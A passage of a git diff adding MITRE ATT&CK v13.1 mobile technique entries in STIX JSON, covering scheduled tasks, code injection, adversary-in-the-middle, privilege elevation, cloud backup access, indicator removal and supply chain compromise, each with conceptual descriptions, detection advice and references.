"identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--00290ac5-551e-44aa-bbd8-c4b913488a6d.json b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--00290ac5-551e-44aa-bbd8-c4b913488a6d.json new file mode 100644 index 0000000000000000000000000000000000000000..27446ba7701cb84826da182f9b57ee7d3185746a --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--00290ac5-551e-44aa-bbd8-c4b913488a6d.json @@ -0,0 +1,64 @@ +{ + "type": "bundle", + "id": "bundle--fe970af0-3ca3-48ea-bade-be2e7d8567a6", + "spec_version": "2.0", + "objects": [ + { + "modified": "2022-10-24T15:09:07.609Z", + "name": "Scheduled Task/Job", + "description": "Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. On Android and iOS, APIs and libraries exist to facilitate scheduling tasks to execute at a specified date, time, or interval.\n\nOn Android, the `WorkManager` API allows asynchronous tasks to be scheduled with the system. `WorkManager` was introduced to unify task scheduling on Android, using `JobScheduler`, `GcmNetworkManager`, and `AlarmManager` internally. `WorkManager` offers a lot of flexibility for scheduling, including periodically, one time, or constraint-based (e.g. only when the device is charging).(Citation: Android WorkManager)\n\nOn iOS, the `NSBackgroundActivityScheduler` API allows asynchronous tasks to be scheduled with the system. The tasks can be scheduled to be repeating or non-repeating, however, the system chooses when the tasks will be executed. The app can choose the interval for repeating tasks, or the delay between scheduling and execution for one-time tasks.(Citation: Apple NSBackgroundActivityScheduler)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "execution" + }, + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "persistence" + } + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_detection": "Scheduling tasks/jobs can be difficult to detect, and therefore enterprises may be better served focusing on detection at other stages of adversarial behavior.", + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_contributors": [ + "Lorin Wu, Trend Micro" + ], + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "type": "attack-pattern", + "id": "attack-pattern--00290ac5-551e-44aa-bbd8-c4b913488a6d", + "created": "2020-11-04T16:43:31.619Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1603", + "external_id": "T1603" + }, + { + "source_name": "Android WorkManager", + "description": "Google. (n.d.). Schedule tasks with WorkManager. Retrieved November 4, 2020.", + "url": "https://developer.android.com/topic/libraries/architecture/workmanager" + }, + { + "source_name": "Apple NSBackgroundActivityScheduler", + "description": "Apple. (n.d.). NSBackgroundActivityScheduler. Retrieved November 4, 2020.", + "url": "https://developer.apple.com/documentation/foundation/nsbackgroundactivityscheduler" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_is_subtechnique": false + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--039bc59c-ecc7-4997-b2b4-4ab728bd91aa.json b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--039bc59c-ecc7-4997-b2b4-4ab728bd91aa.json new file mode 100644 index 0000000000000000000000000000000000000000..0baf9cb31d72c0c151e90053bfabc4a7bd1f68e7 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--039bc59c-ecc7-4997-b2b4-4ab728bd91aa.json @@ -0,0 +1,72 @@ +{ + "type": "bundle", + "id": "bundle--d0544880-3945-421e-8d41-0ba7e91c8e2f", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "id": "attack-pattern--039bc59c-ecc7-4997-b2b4-4ab728bd91aa", + "created": "2019-10-30T15:37:55.029Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1540", + "url": "https://attack.mitre.org/techniques/T1540" + }, + { + "source_name": "Fadeev Code Injection Aug 2018", + "url": "https://fadeevab.com/shared-library-injection-on-android-8/", + "description": "Alexandr Fadeev. (2018, August 26). Shared Library Injection on Android 8.0. Retrieved October 30, 2019." + }, + { + "source_name": "Google Triada June 2019", + "url": "https://security.googleblog.com/2019/06/pha-family-highlights-triada.html", + "description": "Lukasz Siewierski. (2019, June 6). PHA Family Highlights: Triada. Retrieved July 16, 2019." + }, + { + "source_name": "Shunix Code Injection Mar 2016", + "url": "https://shunix.com/shared-library-injection-in-android/", + "description": "Shunix . (2016, March 22). Shared Library Injection in Android. Retrieved October 30, 2019." + } + ], + "x_mitre_deprecated": false, + "revoked": true, + "description": "Adversaries may use code injection attacks to implant arbitrary code into the address space of a running application. Code is then executed or interpreted by that application. Adversaries utilizing this technique may exploit capabilities to load code in at runtime through dynamic libraries.\n\nWith root access, `ptrace` can be used to target specific applications and load shared libraries into its process memory.(Citation: Shunix Code Injection Mar 2016)(Citation: Fadeev Code Injection Aug 2018) By injecting code, an adversary may be able to gain access to higher permissions held by the targeted application by executing as the targeted application. In addition, the adversary may be able to evade detection or enable persistent access to a system under the guise of the application\u2019s process.(Citation: Google Triada June 2019)\n", + "modified": "2022-03-30T19:14:20.369Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Code Injection", + "x_mitre_detection": "Code injection can be difficult to detect, and therefore enterprises may be better served focusing on detection at other stages of adversarial behavior.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "persistence" + }, + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "privilege-escalation" + }, + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "defense-evasion" + } + ], + "x_mitre_is_subtechnique": false, + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--08e22979-d320-48ed-8711-e7bf94aabb13.json b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--08e22979-d320-48ed-8711-e7bf94aabb13.json new file mode 100644 index 0000000000000000000000000000000000000000..a8b46e283085995bd86e5c4b791273ffa5f397bc --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--08e22979-d320-48ed-8711-e7bf94aabb13.json @@ -0,0 +1,74 @@ +{ + "type": "bundle", + "id": "bundle--8c6a358b-cd1e-4201-b041-36f95c717065", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-15T16:39:32.207Z", + "name": "Adversary-in-the-Middle", + "description": "Adversaries may attempt to position themselves between two or more networked devices to support follow-on behaviors such as [Transmitted Data Manipulation](https://attack.mitre.org/techniques/T1565/002) or [Endpoint Denial of Service](https://attack.mitre.org/techniques/T1642). \n\n \n\n[Adversary-in-the-Middle](https://attack.mitre.org/techniques/T1638) can be achieved through several mechanisms, such as a malicious application registering itself as a VPN client. By doing this, the adversary can effectively redirect device traffic to wherever they want. However, registering as a VPN client requires user consent on both Android and iOS. Additionally, on iOS, the application requires a special entitlement that must be granted by Apple. Alternatively, if an application is able to escalate privileges, it can potentially utilize those privileges to gain access to network traffic. \n\n \n\nOutside of a mobile device, adversaries may be able to capture traffic by employing a rogue base station or Wi-Fi access point. These devices will allow adversaries to capture network traffic after it has left the device, while it is flowing to its destination. On a local network, enterprise techniques could be used, such as DNS redirection or DNS poisoning. \n\n \n\nIf applications properly encrypt their network traffic, sensitive data may not be accessible an adversary, depending on the point of capture. ", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "collection" + } + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Application vetting services should look for applications that request VPN access. These applications should be heavily scrutinized since VPN functionality is not very common. Mobile security products can potentially detect rogue Wi-Fi access points if the adversary is attempting to decrypt traffic using an untrusted SSL certificate. \n\n \n\nOn both Android and iOS, users must grant consent to an application to act as a VPN. Both platforms also provide visual context to the user in the top status bar when a VPN connection is active. Users can see registered VPN services in the device settings. ", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_version": "2.1", + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "type": "attack-pattern", + "id": "attack-pattern--08e22979-d320-48ed-8711-e7bf94aabb13", + "created": "2022-04-05T20:11:08.894Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1638", + "external_id": "T1638" + }, + { + "source_name": "NIST Mobile Threat Catalogue", + "url": "https://pages.nist.gov/mobile-threat-catalogue/cellular-threats/CEL-3.html", + "external_id": "CEL-3" + }, + { + "source_name": "NIST Mobile Threat Catalogue", + "url": "https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-0.html", + "external_id": "APP-0" + }, + { + "source_name": "NIST Mobile Threat Catalogue", + "url": "https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-1.html", + "external_id": "APP-1" + }, + { + "source_name": "NIST Mobile Threat Catalogue", + "url": "https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-8.html", + "external_id": "APP-8" + }, + { + "source_name": "NIST Mobile Threat Catalogue", + "url": "https://pages.nist.gov/mobile-threat-catalogue/ecosystem-threats/ECO-12.html", + "external_id": "ECO-12" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--08ea902d-ecb5-47ed-a453-2798057bb2d3.json b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--08ea902d-ecb5-47ed-a453-2798057bb2d3.json new file mode 100644 index 0000000000000000000000000000000000000000..b76106203dd342d9929ca38c9d44788578041486 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--08ea902d-ecb5-47ed-a453-2798057bb2d3.json @@ -0,0 +1,53 @@ +{ + "type": "bundle", + "id": "bundle--6c9a56bc-e25c-42cb-b0e7-7da8b78c3cdf", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-15T16:23:59.281Z", + "name": "Abuse Elevation Control Mechanism", + "description": "Adversaries may circumvent mechanisms designed to control elevated privileges to gain higher-level permissions. Most modern systems contain native elevation control mechanisms that are intended to limit privileges that a user can gain on a machine. Authorization has to be granted to specific users in order to perform tasks that are designated as higher risk. An adversary can use several methods to take advantage of built-in control mechanisms in order to escalate privileges on a system. ", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "privilege-escalation" + } + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "When an application requests administrator permission, users are presented with a popup and the option to grant or deny the request. Application vetting services can detect when an application requests administrator permission. Extra scrutiny could be applied to applications that do", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_version": "1.1", + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "type": "attack-pattern", + "id": "attack-pattern--08ea902d-ecb5-47ed-a453-2798057bb2d3", + "created": "2022-04-01T15:54:05.633Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1626", + "external_id": "T1626" + }, + { + "source_name": "NIST Mobile Threat Catalogue", + "url": "https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-22.html", + "external_id": "APP-22" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--0bcc4ec1-a897-49a9-a9ff-c00df1d1209d.json b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--0bcc4ec1-a897-49a9-a9ff-c00df1d1209d.json new file mode 100644 index 0000000000000000000000000000000000000000..5dd77338b1450d2cc6a2bbcaaf773769bafc7416 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--0bcc4ec1-a897-49a9-a9ff-c00df1d1209d.json @@ -0,0 +1,40 @@ +{ + "type": "bundle", + "id": "bundle--9922d725-ab3d-481a-81e9-a1f4c77e76e0", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "id": "attack-pattern--0bcc4ec1-a897-49a9-a9ff-c00df1d1209d", + "type": "attack-pattern", + "created": "2017-10-25T14:48:08.155Z", + "revoked": true, + "external_references": [ + { + "source_name": "mitre-mobile-attack", + "url": "https://attack.mitre.org/techniques/T1454", + "external_id": "T1454" + } + ], + "modified": "2019-04-29T19:35:30.985Z", + "name": "Malicious SMS Message", + "description": "Test", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "collection" + } + ], + "x_mitre_version": "1.0", + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "x_mitre_is_subtechnique": false + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--0c71033e-401e-4b97-9309-7a7c95e43a5d.json b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--0c71033e-401e-4b97-9309-7a7c95e43a5d.json new file mode 100644 index 0000000000000000000000000000000000000000..312b96383151ff00bf7b34d55cff6f86b2d74d50 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--0c71033e-401e-4b97-9309-7a7c95e43a5d.json @@ -0,0 +1,69 @@ +{ + "type": "bundle", + "id": "bundle--1d7b0740-0d62-4d60-b8af-d501c7348fe2", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "id": "attack-pattern--0c71033e-401e-4b97-9309-7a7c95e43a5d", + "created": "2017-10-25T14:48:18.237Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1470", + "url": "https://attack.mitre.org/techniques/T1470" + }, + { + "source_name": "Elcomsoft-EPPB", + "url": "https://www.elcomsoft.com/eppb.html", + "description": "Elcomsoft. (n.d.). Elcomsoft Phone Breaker. Retrieved December 29, 2016." + }, + { + "source_name": "Elcomsoft-WhatsApp", + "url": "https://blog.elcomsoft.com/2017/07/extract-and-decrypt-whatsapp-backups-from-icloud/", + "description": "Oleg Afonin. (2017, July 20). Extract and Decrypt WhatsApp Backups from iCloud. Retrieved July 6, 2018." + }, + { + "url": "https://pages.nist.gov/mobile-threat-catalogue/ecosystem-threats/ECO-0.html", + "source_name": "NIST Mobile Threat Catalogue", + "external_id": "ECO-0" + }, + { + "url": "https://pages.nist.gov/mobile-threat-catalogue/ecosystem-threats/ECO-1.html", + "source_name": "NIST Mobile Threat Catalogue", + "external_id": "ECO-1" + } + ], + "x_mitre_deprecated": true, + "revoked": false, + "description": "An adversary who is able to obtain unauthorized access to or misuse authorized access to cloud backup services (e.g. Google's Android backup service or Apple's iCloud) could use that access to obtain sensitive data stored in device backups. For example, the Elcomsoft Phone Breaker product advertises the ability to retrieve iOS backup data from Apple's iCloud (Citation: Elcomsoft-EPPB). Elcomsoft also describes (Citation: Elcomsoft-WhatsApp) obtaining WhatsApp communication histories from backups stored in iCloud.", + "modified": "2022-04-06T15:54:11.189Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Obtain Device Cloud Backups", + "x_mitre_detection": "Google provides the ability for users to view their account activity. Apple iCloud also provides notifications to users of account activity.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "remote-service-effects" + } + ], + "x_mitre_is_subtechnique": false, + "x_mitre_tactic_type": [ + "Without Adversary Device Access" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--0cdd66ad-26ac-4338-a764-4972a1e17ee3.json b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--0cdd66ad-26ac-4338-a764-4972a1e17ee3.json new file mode 100644 index 0000000000000000000000000000000000000000..5133bd7a237386098f2010bdac8e833432467e9b --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--0cdd66ad-26ac-4338-a764-4972a1e17ee3.json @@ -0,0 +1,53 @@ +{ + "type": "bundle", + "id": "bundle--8c316efa-bb21-4ef7-b06f-714a686784e4", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-20T18:43:03.218Z", + "name": "Uninstall Malicious Application", + "description": "Adversaries may include functionality in malware that uninstalls the malicious application from the device. This can be achieved by: \n \n* Abusing device owner permissions to perform silent uninstallation using device owner API calls. \n* Abusing root permissions to delete files from the filesystem. \n* Abusing the accessibility service. This requires sending an intent to the system to request uninstallation, and then abusing the accessibility service to click the proper places on the screen to confirm uninstallation.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "defense-evasion" + } + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Users can see a list of applications that can use accessibility services in the device settings. Application vetting services could look for use of the accessibility service or features that typically require root access.", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_version": "1.1", + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "type": "attack-pattern", + "id": "attack-pattern--0cdd66ad-26ac-4338-a764-4972a1e17ee3", + "created": "2022-03-30T19:31:31.855Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1630/001", + "external_id": "T1630.001" + }, + { + "source_name": "NIST Mobile Threat Catalogue", + "url": "https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-43.html", + "external_id": "APP-43" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--0d4e3bbb-7af5-4c88-a215-0c0906bc1e8d.json b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--0d4e3bbb-7af5-4c88-a215-0c0906bc1e8d.json new file mode 100644 index 0000000000000000000000000000000000000000..a2b920a096c88ac2f13d13ae7be17e506fc0b8d3 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--0d4e3bbb-7af5-4c88-a215-0c0906bc1e8d.json @@ -0,0 +1,54 @@ +{ + "type": "bundle", + "id": "bundle--f0a355c2-bc4a-45d8-95c5-2ec32b7043bf", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-20T18:42:18.121Z", + "name": "Indicator Removal on Host", + "description": "Adversaries may delete, alter, or hide generated artifacts on a device, including files, jailbreak status, or the malicious application itself. These actions may interfere with event collection, reporting, or other notifications used to detect intrusion activity. This may compromise the integrity of mobile security solutions by causing notable events or information to go unreported.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "defense-evasion" + } + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Mobile security products can detect which applications can request device administrator permissions. Users can view applications with administrator access through the device settings, and may also notice if user data is inexplicably missing. Users can see a list of applications that can use accessibility services in the device settings. Application vetting services could look for use of APIs that could indicate the application is trying to hide activity.", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_platforms": [ + "iOS", + "Android" + ], + "x_mitre_version": "1.1", + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "type": "attack-pattern", + "id": "attack-pattern--0d4e3bbb-7af5-4c88-a215-0c0906bc1e8d", + "created": "2022-03-30T19:28:25.541Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1630", + "external_id": "T1630" + }, + { + "source_name": "NIST Mobile Threat Catalogue", + "url": "https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-43.html", + "external_id": "APP-43" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--0d95940f-9583-4e0f-824c-a42c1be47fad.json b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--0d95940f-9583-4e0f-824c-a42c1be47fad.json new file mode 100644 index 0000000000000000000000000000000000000000..98f892a878b636961c2e99e20aec97b09505df04 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--0d95940f-9583-4e0f-824c-a42c1be47fad.json @@ -0,0 +1,174 @@ +{ + "type": "bundle", + "id": "bundle--33d18949-c530-4b89-96ae-438a81a5ddd4", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-20T18:52:29.947Z", + "name": "Supply Chain Compromise", + "description": "Adversaries may manipulate products or product delivery mechanisms prior to receipt by a final consumer for the purpose of data or system compromise.\n\nSupply chain compromise can take place at any stage of the supply chain including:\n\n* Manipulation of development tools\n* Manipulation of a development environment\n* Manipulation of source code repositories (public or private)\n* Manipulation of source code in open-source dependencies\n* Manipulation of software update/distribution mechanisms\n* Compromised/infected system images\n* Replacement of legitimate software with modified versions\n* Sales of modified/counterfeit products to legitimate distributors\n* Shipment interdiction\n\nWhile supply chain compromise can impact any component of hardware or software, attackers looking to gain execution have often focused on malicious additions to legitimate software in software distribution or update channels. Targeting may be specific to a desired victim set or malicious software may be distributed to a broad set of consumers but only move on to additional tactics on specific victims. Popular open source projects that are used as dependencies in many applications may also be targeted as a means to add malicious code to users of the dependency, specifically with the widespread usage of third-party advertising libraries.(Citation: Grace-Advertisement)(Citation: NowSecure-RemoteCode)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "initial-access" + } + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Usage of insecure or malicious third-party libraries could be detected by application vetting services. Malicious software development tools could be detected by enterprises that deploy endpoint protection software on computers that are used to develop mobile apps. Application vetting could detect the usage of insecure or malicious third-party libraries.", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_version": "2.1", + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "type": "attack-pattern", + "id": "attack-pattern--0d95940f-9583-4e0f-824c-a42c1be47fad", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1474", + "external_id": "T1474" + }, + { + "source_name": "Grace-Advertisement", + "description": "M. Grace et al. (2012, April 16-18). Unsafe exposure analysis of mobile in-app advertisements. Retrieved December 22, 2016.", + "url": "https://www.csc2.ncsu.edu/faculty/xjiang4/pubs/WISEC12_ADRISK.pdf" + }, + { + "source_name": "NowSecure-RemoteCode", + "description": "Ryan Welton. (2015, June 15). A Pattern for Remote Code Execution using Arbitrary File Writes and MultiDex Applications. Retrieved December 22, 2016.", + "url": "https://www.nowsecure.com/blog/2015/06/15/a-pattern-for-remote-code-execution-using-arbitrary-file-writes-and-multidex-applications/" + }, + { + "source_name": "NIST Mobile Threat Catalogue", + "url": "https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-6.html", + "external_id": "APP-6" + }, + { + "source_name": "NIST Mobile Threat Catalogue", + "url": "https://pages.nist.gov/mobile-threat-catalogue/supply-chain-threats/SPC-0.html", + "external_id": "SPC-0" + }, + { + "source_name": "NIST Mobile Threat Catalogue", + "url": "https://pages.nist.gov/mobile-threat-catalogue/supply-chain-threats/SPC-1.html", + "external_id": "SPC-1" + }, + { + "source_name": "NIST Mobile Threat Catalogue", + "url": "https://pages.nist.gov/mobile-threat-catalogue/supply-chain-threats/SPC-2.html", + "external_id": "SPC-2" + }, + { + "source_name": "NIST Mobile Threat Catalogue", + "url": "https://pages.nist.gov/mobile-threat-catalogue/supply-chain-threats/SPC-3.html", + "external_id": "SPC-3" + }, + { + "source_name": "NIST Mobile Threat Catalogue", + "url": "https://pages.nist.gov/mobile-threat-catalogue/supply-chain-threats/SPC-4.html", + "external_id": "SPC-4" + }, + { + "source_name": "NIST Mobile Threat Catalogue", + "url": "https://pages.nist.gov/mobile-threat-catalogue/supply-chain-threats/SPC-5.html", + "external_id": "SPC-5" + }, + { + "source_name": "NIST Mobile Threat Catalogue", + "url": "https://pages.nist.gov/mobile-threat-catalogue/supply-chain-threats/SPC-6.html", + "external_id": "SPC-6" + }, + { + "source_name": "NIST Mobile Threat Catalogue", + "url": "https://pages.nist.gov/mobile-threat-catalogue/supply-chain-threats/SPC-7.html", + "external_id": "SPC-7" + }, + { + "source_name": "NIST Mobile Threat Catalogue", + "url": "https://pages.nist.gov/mobile-threat-catalogue/supply-chain-threats/SPC-8.html", + "external_id": "SPC-8" + }, + { + "source_name": "NIST Mobile Threat Catalogue", + "url": "https://pages.nist.gov/mobile-threat-catalogue/supply-chain-threats/SPC-9.html", + "external_id": "SPC-9" + }, + { + "source_name": "NIST Mobile Threat Catalogue", + "url": "https://pages.nist.gov/mobile-threat-catalogue/supply-chain-threats/SPC-10.html", + "external_id": "SPC-10" + }, + { + "source_name": "NIST Mobile Threat Catalogue", + "url": "https://pages.nist.gov/mobile-threat-catalogue/supply-chain-threats/SPC-11.html", + "external_id": "SPC-11" + }, + { + "source_name": "NIST Mobile Threat Catalogue", + "url": "https://pages.nist.gov/mobile-threat-catalogue/supply-chain-threats/SPC-12.html", + "external_id": "SPC-12" + }, + { + "source_name": "NIST Mobile Threat Catalogue", + "url": "https://pages.nist.gov/mobile-threat-catalogue/supply-chain-threats/SPC-13.html", + "external_id": "SPC-13" + }, + { + "source_name": "NIST Mobile Threat Catalogue", + "url": "https://pages.nist.gov/mobile-threat-catalogue/supply-chain-threats/SPC-14.html", + "external_id": "SPC-14" + }, + { + "source_name": "NIST Mobile Threat Catalogue", + "url": "https://pages.nist.gov/mobile-threat-catalogue/supply-chain-threats/SPC-15.html", + "external_id": "SPC-15" + }, + { + "source_name": "NIST Mobile Threat Catalogue", + "url": "https://pages.nist.gov/mobile-threat-catalogue/supply-chain-threats/SPC-16.html", + "external_id": "SPC-16" + }, + { + "source_name": "NIST Mobile Threat Catalogue", + "url": "https://pages.nist.gov/mobile-threat-catalogue/supply-chain-threats/SPC-17.html", + "external_id": "SPC-17" + }, + { + "source_name": "NIST Mobile Threat Catalogue", + "url": "https://pages.nist.gov/mobile-threat-catalogue/supply-chain-threats/SPC-18.html", + "external_id": "SPC-18" + }, + { + "source_name": "NIST Mobile Threat Catalogue", + "url": "https://pages.nist.gov/mobile-threat-catalogue/supply-chain-threats/SPC-19.html", + "external_id": "SPC-19" + }, + { + "source_name": "NIST Mobile Threat Catalogue", + "url": "https://pages.nist.gov/mobile-threat-catalogue/supply-chain-threats/SPC-20.html", + "external_id": "SPC-20" + }, + { + "source_name": "NIST Mobile Threat Catalogue", + "url": "https://pages.nist.gov/mobile-threat-catalogue/supply-chain-threats/SPC-21.html", + "external_id": "SPC-21" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git 